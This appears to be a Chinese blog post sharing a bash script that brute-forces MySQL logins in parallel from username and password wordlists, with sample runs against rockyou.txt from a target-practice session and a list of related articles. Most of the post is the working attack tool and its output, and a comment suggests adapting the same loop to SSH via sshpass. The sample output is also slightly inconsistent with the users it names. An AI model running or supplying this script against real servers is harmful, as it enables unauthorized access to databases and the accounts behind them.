【MySql密码爆破脚本】用于其他爆破工具无法使用的情况下

1、脚本

shell 复制代码
#!/bin/bash

# 脚本参数
username=$1  # MySQL用户(或字典路径)
password=$2  # MySQL密码(或字典路径)
task_num=${3:-32}  # 并发数,默认 32

# 检查参数是否存在
if [ -z "$username" ] || [ -z "$password" ]; then
    echo "请输入用户名(或字典路径)和密码(或字典路径)"
    echo "用法: ./mysql_login.sh username password"
    exit 1
fi

# 并发数,默认 32
if ! [[ $task_num =~ ^[0-9]+$ ]]; then
    task_num=32
fi

# 读取用户字典文件
echo '读取用户信息...'
if [ -f "$username" ]; then
    usernames=$(cat $username)
else
    usernames=$(echo $username | cat)
fi
# 读取密码字典文件
echo '读取密码信息...'
if [ -f "$password" ]; then
    passwords=$(cat $password)
else
    passwords=$(echo $password | cat)
fi

# 尝试登录函数
function try_mysql_login() {
    user=$1
    pswd=$2
    # 尝试登录MySQL
    output=$(mysql -u $user -p$pswd -e "exit" 2>&1)

    # 检查输出是否包含错误信息
    if [[ ! $output =~ 'ERROR' ]]; then
        echo "成功登录,用户密码为 -> $user : $pswd"
        # 获取当前脚本的 PID
        script_pid=$(ps -p $$ | grep -v PID | awk '{print $1}')
        # 强制结束当前脚本
        kill -s 9 $script_pid
    fi
}

function print_progress() {
    # 打印进度,如果一直没有输出,时间太长会感觉卡死了
    numb=$1
    task=$2
    snum=$3
    user=$4
    pswd=$5
    if [ $(($numb % ($task * 10))) -eq 0 ]; then
        echo "尝试登录进度($numb/$snum) -> $user : $pswd"
    fi
}

# 循环遍历密码字典
pool=0
count=0
total_tasks=$(($(echo "$usernames" | wc -l) * $(echo "$passwords" | wc -l)))
for username in $usernames; do
    echo "尝试用户: $username"
    for password in $passwords; do
        count=$((count + 1))
        # 等待空闲进程池中的任务
        while [ $pool -ge $task_num ]; do
          wait -n
          ((pool--))
        done
        
        # 创建新任务并加入进程池
        {
          try_mysql_login $username $password
          # 在这里执行具体的登录操作,例如使用ssh命令
          # 示例:sshpass -p "$password" ssh "$user"@hostname command
        } &
        ((pool++))
        print_progress $count $task_num $total_tasks $username $password
    done
done

# 等待所有进程完成
wait

echo "密码爆破失败"
exit 1

2、使用方法

使用场景:是一次打靶经历,内网容器,无法连接外网,又有很多命令失效,无法使用专门的MySql爆破工具,本人又很菜,就只能想到自己写一个sh的爆破脚本了。

shell 复制代码
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# ./mysql_login.sh mike /usr/share/wordlists/rockyou.txt 64                 
尝试用户: mike
尝试登录进度 -> mike : pebbles
尝试登录进度 -> mike : poohbear1
尝试登录进度 -> mike : jacqueline
尝试登录进度 -> mike : scarlett
密码爆破失败
shell 复制代码
mike@host2:/tmp$ ./mysql_login.sh user.txt top500.txt
尝试用户: root
尝试登录进度 -> mike : pebbles
尝试登录进度 -> mike : poohbear1
尝试用户: mike
尝试登录进度 -> mike : pebbles
成功登录,密码为: password
相关推荐
异常君32 分钟前
高并发数据写入场景下 MySQL 的性能瓶颈与替代方案
java·mysql·性能优化
RestCloud37 分钟前
如何通过ETLCloud实现跨系统数据同步?
数据库·数据仓库·mysql·etl·数据处理·数据同步·集成平台
程序员岳焱1 小时前
Java 与 MySQL 性能优化:MySQL 慢 SQL 诊断与分析方法详解
后端·sql·mysql
秃头摸鱼侠2 小时前
MySQL安装与配置
数据库·mysql·adb
tonexuan3 小时前
MySQL 8.0 绿色版安装和配置过程
数据库·mysql
JohnYan3 小时前
工作笔记- 记一次MySQL数据移植表空间错误排除
数据库·后端·mysql
我最厉害。,。3 小时前
Windows权限提升篇&数据库篇&MYSQL&MSSQL&ORACLE&自动化项目
数据库·mysql·sqlserver
痴人说梦梦中人4 小时前
SwaggerFuzzer:一款自动化 OpenAPI/Swagger 接口未授权访问测试工具
网络安全·渗透测试·自动化·api测试·漏洞利用·信息搜集
@大嘴巴子5 小时前
MySQL知识回顾总结----数据库基础
数据库·mysql
lubiii_5 小时前
SQL手工测试(MySQL数据库)
数据库·mysql·web安全·网络安全